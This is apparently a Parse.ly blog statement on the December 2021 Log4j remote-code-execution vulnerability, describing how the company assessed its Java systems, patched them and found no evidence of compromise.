A new vulnerability for Apache Log4j, a popular logging library for the Java programming language, was disclosed on December 9, 2021. A proof-of-concept was posted to a Github repository and on Twitter. The CTO of Cloudflare has a nice write-up on how this exploit works under the hood. This vulnerability allowed remote code execution (RCE) on any system where an attacker could force a specific unaltered/unencoded log message to be written, otherwise known as a “log injection” attack.
The Parse.ly team was alerted to this vulnerability within hours of it being published. We first assessed Parse.ly edge systems (e.g. data collection, dashboard, and API) and determined that since we use a combination of Python and C programming language based systems (not Java or JVM systems), we were not affected at the edge. However, a detailed inventory of our cloud environment revealed some internal databases and data processing systems that make use of Java. As a result, our on-call team declared this a high-priority incident and began the process of patching all of the Java code in our production and development environments.
The Parse.ly team has since patched all of these systems, and internal analysis shows no evidence of a security incident. Many internet companies were affected by this incident, such as Apple, Steam, and Twitter, as detailed in this Arstechnica article. However, compromising one of Parse.ly’s internal systems would have required specially-crafted messages with detailed knowledge of our internal network and internal data processing flows, as well as the triggering of very specific and esoteric edge cases in these systems. Thankfully, as of now, all the systems are patched, so this vulnerability is mitigated.
Parse.ly takes the security of its customer’s data very seriously and will continue to monitor and patch in response to any future security issues. See also our status page incident, where maintenance operations related to system patching were started and then completed.